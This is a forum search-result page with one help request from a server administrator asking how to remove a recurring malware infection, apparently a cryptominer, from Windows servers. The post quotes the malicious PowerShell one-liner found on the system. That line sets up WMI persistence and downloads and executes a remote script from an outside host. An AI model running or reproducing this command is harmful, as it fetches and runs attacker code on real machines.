Search the Community
Showing results for tags 'mate6.ps1'.
Found 1 result
-
Hi, I have to Windows servers (2008 and SBS2011) and both were infected with Y1.bat variant, I run some scripts and apparently I remove them from the system, actually I have Malwarebytes EndPoint installed and from time to time the anti-exploit shows a message blocking some IP address from access, but none people use this server as a workstation. Now apparently the malware comes again but with a differente variant and when I scan with Malwarebytes no infection appears, I download and Scan with the Anti-Rootkit and nothing appear. I see that the %temp% folders is redirected to a Temp\1 folder (same as the last time), not sure how to properly remove this thread. Any suggestion will be appreciated. Before I discover the following script that I properly remove: powershell -nop "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http://stafftest.spdns.eu:8000/mate6.ps1')}" The following link explain how to remove it in the past: https://community.spiceworks.com/topic/2080003-malicious-powershell-script-causing-100-cpu-load-solved